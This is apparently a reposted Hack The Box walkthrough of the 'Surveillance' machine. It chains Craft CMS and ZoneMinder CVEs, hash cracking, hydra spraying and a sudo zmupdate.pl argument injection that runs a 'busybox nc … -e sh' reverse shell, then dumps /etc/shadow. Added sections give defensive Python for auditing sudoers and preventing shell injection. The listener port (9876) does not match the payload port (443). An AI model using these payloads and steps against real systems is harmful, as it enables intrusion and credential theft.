HTB-Surveillance(Medium)

admin, 2023-12-12 23:15:36, 526 views, 8187 characters, 27 min 17 s read

Key points:

Craft CMS CVE-2023-41892; ZoneMinder CVE-2023-26035; sudo *.pl argument injection




Scan

┌──(kali㉿kali)-[~/Desktop/htb]
└─$ sudo nmap -sC -sV -T4 -Pn 10.10.11.245
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 06:50 EST
Warning: 10.10.11.245 giving up on port because retransmission cap hit (6).
Nmap scan report for surveillance.htb (10.10.11.245)
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title:  Surveillance
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.97 seconds



Enum

Surveillance: it looks like a website for home security cameras. One new English word from HTB every week.

Clicking around turned up nothing, the page source turned up nothing, and subdomain fuzzing turned up nothing; a directory scan found the admin route.

gobuster dir -u http://surveillance.htb  -w /usr/share/wordlists/wfuzz/webservices/ws-dirs.txt  -x php -t 25

Visiting it and reading the page source shows Craft CMS, which I ran into at ACTF just recently; there is a public exploit, so it is a one-shot.


CVE-2023-41892

The home page reveals version 4.4.14. A Google search turned up an article; I tweaked the script a little so it pops a bash shell, which is more comfortable to work with.

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

Walking the directory tree, /var/www/html/craft/storage/backups has something in it.

After extracting it is a SQL file; a quick look lets you filter out the admin record, and john cracks it instantly.

'[email protected]','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec'
┌──(kali㉿kali)-[~/Desktop/htb/Surveillance]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
starcraft122490   (?)
1g 0:00:00:00 DONE (2023-12-12 07:14) 4.347g/s 15529Kp/s 15529Kc/s 15529KC/s stefon23..srflo1
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.

Check /etc/passwd, pull the users with UID 1000 and above into a file named user, and spray the password with hydra (there are really only two users here, so doing it by hand works too).

hydra -L user -p starcraft122490 -vV -f ssh://10.10.11.245/



Lateral movement

A quick look as the current user: sudo and SUID offer nothing. There is a local port 8080, so presumably an internal service to attack; forward it out.

An SSH reverse proxy lagged horribly, so I uploaded chisel to reach the internal service instead; still laggy as hell.

chisel server --reverse --port 8888
./chisel client 10.10.14.39:8888 R:1111:127.0.0.1:8080

It is the ZoneMinder CMS; search for it: https://sploitus.com/exploit?id=1337DAY-ID-39149&utm_source=rss&utm_medium=rss

There is a Metasploit module that can be used to get a shell: exploit/unix/webapp/zoneminder_snapshots

(The VPN froze here; switched to another VPN and tried again.)

It would not run at all, so I switched to another write-up's approach and ran the Python script instead; that got a shell (so laggy).

https://github.com/rvizx/CVE-2023-26035


ROOT

sudo allows *.pl to be executed without a password; the privilege escalation is certainly here, so let's take a look.

zoneminder@surveillance:/usr/bin$ ls -la *.pl
-rwxr-xr-x 1 root root 43027 Nov 23  2022 zmaudit.pl
-rwxr-xr-x 1 root root 12939 Nov 23  2022 zmcamtool.pl
-rwxr-xr-x 1 root root  6043 Nov 23  2022 zmcontrol.pl
-rwxr-xr-x 1 root root 26232 Nov 23  2022 zmdc.pl
-rwxr-xr-x 1 root root 35206 Nov 23  2022 zmfilter.pl
-rwxr-xr-x 1 root root  5640 Nov 23  2022 zmonvif-probe.pl
-rwxr-xr-x 1 root root 19386 Nov 23  2022 zmonvif-trigger.pl
-rwxr-xr-x 1 root root 13994 Nov 23  2022 zmpkg.pl
-rwxr-xr-x 1 root root 17492 Nov 23  2022 zmrecover.pl
-rwxr-xr-x 1 root root  4815 Nov 23  2022 zmstats.pl
-rwxr-xr-x 1 root root  2133 Nov 23  2022 zmsystemctl.pl
-rwxr-xr-x 1 root root 13111 Nov 23  2022 zmtelemetry.pl
-rwxr-xr-x 1 root root  5340 Nov 23  2022 zmtrack.pl
-rwxr-xr-x 1 root root 18482 Nov 23  2022 zmtrigger.pl
-rwxr-xr-x 1 root root 45421 Nov 23  2022 zmupdate.pl
-rwxr-xr-x 1 root root  8205 Nov 23  2022 zmvideo.pl
-rwxr-xr-x 1 root root  7022 Nov 23  2022 zmwatch.pl
-rwxr-xr-x 1 root root 19655 Nov 23  2022 zmx10.pl
Skim a few of them:
cat zmdc.pl
cat zmupdate.pl
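The rule that lets a service account run any /usr/bin/*.pl as root is the condition the whole escalation rests on. As an added example (not part of the original write-up), the Python audit below parses sudoers-style rules and flags every command whose path or arguments contain a glob, which is how a defender would catch a rule like this before someone else does. The sudoers text is a constructed sample, not the box's real file.

```python
import re

# Constructed sample /etc/sudoers content; it is NOT the machine's real file.
# The zoneminder rule mirrors the shape of the "*.pl without a password" rule
# the write-up describes.
SAMPLE_SUDOERS = """\
# constructed sample, not the real file
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
zoneminder ALL=(ALL) NOPASSWD: /usr/bin/zm*.pl *
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/journalctl -u nginx*
"""

# user_or_group  hosts=(runas)  [TAG:] command [, command ...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)=(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$"
)
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")
GLOB_CHARS = set("*?[")


def split_commands(spec):
    """Split 'NOPASSWD: /a/b *, /c/d' into (tags, command) pairs.

    In sudoers a tag stays in effect for the following commands of the same
    list until another tag overrides it, so tags are carried across chunks.
    """
    tags = set()
    out = []
    for chunk in spec.split(","):
        rest = chunk.strip()
        while True:
            m = TAG_RE.match(rest)
            if not m:
                break
            tag = m.group(1)
            if tag == "PASSWD":
                tags.discard("NOPASSWD")
            else:
                tags.add(tag)
            rest = rest[m.end():]
        if rest:
            out.append((frozenset(tags), rest))
    return out


def audit_sudoers(text):
    """Return one finding per command whose path or arguments contain a glob."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        m = RULE_RE.match(line) if line else None
        if not m:
            continue                             # Defaults, aliases, blanks
        for tags, command in split_commands(m.group("rest")):
            parts = command.split()
            path, args = parts[0], parts[1:]
            if path == "ALL":
                continue                         # full sudo; out of scope here
            issues = []
            if GLOB_CHARS & set(path):
                issues.append("glob in command path")
            if any(GLOB_CHARS & set(a) for a in args):
                issues.append("wildcard in arguments")
            if issues:
                findings.append({
                    "user": m.group("who"),
                    "runas": m.group("runas") or "root",
                    "nopasswd": "NOPASSWD" in tags,
                    "command": command,
                    "issues": issues,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['user']} -> ({f['runas']}) {flag}{f['command']}: {', '.join(f['issues'])}")
```

Run it against a copy of the real file (`sudo cat /etc/sudoers /etc/sudoers.d/*`) and review every hit: a glob in the command path means any matching binary counts, and a trailing `*` in the arguments means sudo does no validation of what gets passed to it.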

Here the weak credentials root:root get into the database; check it for sensitive information.

That yields the password ZoneMinderPassword2023, and the Config table shows ZM_LD_PRELOAD.


Config table (excerpt; rows whose columns were truncated are omitted):

Id:           87
Name:         ZM_HOME_ABOUT
Value:        1
Type:         boolean
DefaultValue: yes
Hint:         yes|no
Pattern:      (?^i:^([yn]))
Format:       ($1 =~ /^y/) ? 'yes' : 'no'
Prompt:       Whether to enable the ZoneMinder About menu.
Help:
Category:     images
Readonly/Private/System: 0 / 0 / 0

Id:           3
Name:         ZM_LANG_DEFAULT
Value:        en_gb
Type:         string
DefaultValue: en_gb
Hint:         string
Pattern:      (?^:^(.+)$)
Format:       $1
Prompt:       Default language used by web interface
Help:         ZoneMinder allows the web interface to use languages other than English if the appropriate language file has been created and is present. This option allows you to change the default language that is used from the shipped language, British English, to another language
Category:     system
Readonly/Private/System: 0 / 0 / 0

Id:           102
Name:         ZM_LD_PRELOAD
Value:
Type:         string
DefaultValue:
Hint:         /absolute/path/to/somewhere
Pattern:      (?^:^((?:/[^/]*)+?)/?$)
Format:       $1
Prompt:       Path to library to preload before launching daemons
Help:         Some older cameras require the use of the v4l1 compat library. This setting allows the setting of the path to the library, so that it can be loaded by zmdc.pl before launching zmc.
Category:     config
Readonly/Private/System: 0 / 0 / 0

Create a malicious bash script and abuse a zmupdate.pl argument to escalate, since ZM_LD_PRELOAD changes the path here.

#!/bin/bash
busybox nc 10.10.14.115 443 -e sh
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/geq.sh)' --pass=ZoneMinderPassword2023
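The payload works because the value handed to --user ends up inside a shell command string, where the shell evaluates $(...) before the real program ever sees it. The Python illustration below is added here and is not code from the write-up or from ZoneMinder: it shows that vulnerable pattern next to two hardened forms (argv list without a shell, and shlex quoting) plus an allow-list check. The marker command, the function names and the username pattern are assumptions for the demo, not zmupdate.pl's code.

```python
import re
import shlex
import subprocess

# Constructed sample value with the same shape as the write-up's --user payload;
# the command it carries only echoes a marker, so the effect is visible but harmless.
INJECTED_USER = "$(echo INJECTED)"
NORMAL_USER = "zmuser"

# Assumed allow-list for account names (demo policy, not ZoneMinder's).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def validate_username(user):
    """Allow-list check: reject anything that is not a plain account name."""
    if not USERNAME_RE.match(user):
        raise ValueError(f"refusing username with unexpected characters: {user!r}")
    return user


def run_unsafe(user):
    """Vulnerable pattern: the caller-supplied value is spliced into a shell
    command string, so $(...) inside it is evaluated by sh before echo runs."""
    cmd = f"echo user={user}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_argv(user):
    """Hardened: argv list and no shell; the value reaches the program as one
    literal argument and nothing interprets $(...)."""
    return subprocess.run(["echo", f"user={user}"], capture_output=True, text=True).stdout.strip()


def run_quoted(user):
    """If a shell string is unavoidable, quote every interpolated value."""
    cmd = f"echo user={shlex.quote(user)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def run_validated(user):
    """Defence in depth: validate first, then use the argv form anyway."""
    return run_argv(validate_username(user))


if __name__ == "__main__":
    print("unsafe   :", run_unsafe(INJECTED_USER))   # user=INJECTED  (the embedded command ran)
    print("argv     :", run_argv(INJECTED_USER))     # user=$(echo INJECTED)
    print("quoted   :", run_quoted(INJECTED_USER))   # user=$(echo INJECTED)
    print("normal   :", run_validated(NORMAL_USER))  # user=zmuser
    try:
        run_validated(INJECTED_USER)
    except ValueError as e:
        print("validated:", e)
```

The same distinction applies in Perl: `system("cmd -u$user")` goes through the shell, while the list form `system("cmd", "-u$user")` does not, and on top of that sudo's trailing `*` in the rule means every one of those arguments is attacker-chosen.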


Start a listener:

┌──(kali㉿kali)-[~/Desktop/htb/Surveillance]
└─$ nc -nlvp 9876
listening on [any] 9876 ...
id
connect to [10.10.14.115] from (UNKNOWN) [10.10.11.245] 51216
uid=0(root) gid=0(root) groups=0(root)
cat /etc/shadow
root:$y$j9T$bVNsNlTFFqsWiO2JYT0ZH/$ZzxFCnolnSpcSfQxaWNtq3BDIRPIVU9X.dm/ACzRAl9:19651:0:99999:7:::
daemon:*:19213:0:99999:7:::
bin:*:19213:0:99999:7:::
sys:*:19213:0:99999:7:::
sync:*:19213:0:99999:7:::
games:*:19213:0:99999:7:::
man:*:19213:0:99999:7:::
lp:*:19213:0:99999:7:::
mail:*:19213:0:99999:7:::
news:*:19213:0:99999:7:::
uucp:*:19213:0:99999:7:::
proxy:*:19213:0:99999:7:::
www-data:*:19213:0:99999:7:::
backup:*:19213:0:99999:7:::
list:*:19213:0:99999:7:::
irc:*:19213:0:99999:7:::
gnats:*:19213:0:99999:7:::
nobody:*:19213:0:99999:7:::
_apt:*:19213:0:99999:7:::
systemd-network:*:19213:0:99999:7:::
systemd-resolve:*:19213:0:99999:7:::
messagebus:*:19213:0:99999:7:::
systemd-timesync:*:19213:0:99999:7:::
pollinate:*:19213:0:99999:7:::
sshd:*:19213:0:99999:7:::
syslog:*:19213:0:99999:7:::
uuidd:*:19213:0:99999:7:::
tcpdump:*:19213:0:99999:7:::
tss:*:19213:0:99999:7:::
landscape:*:19213:0:99999:7:::
usbmux:*:19374:0:99999:7:::
lxd:!:19374::::::
dnsmasq:*:19459:0:99999:7:::
matthew:$y$j9T$oipsGfEBv1fcFV1uQ6Bl4.$44F4J5xtr2V4oN.zY0OB.8r3p1TllAlaMivft5R8o18:19647:0:99999:7:::
mysql:!:19619:0:99999:7:::
zoneminder:$y$j9T$.wNHpksMBEdFIQZZJTsDp/$r43uCJLrmfIgv4ZnMiyhMqykrru7aoPIuunhUrTTxp/:19647:0:99999:7:::
fwupd-refresh:*:19670:0:99999:7:::
_laurel:!:19670::::::





Originally published on the WeChat public account 搁浅安全: HTB-Surveillance(Medium)

When reposting, please keep the link to this article (CN-SEC 中文网; thanks to the original author for their work): http://cn-sec.com/archives/2292382.html
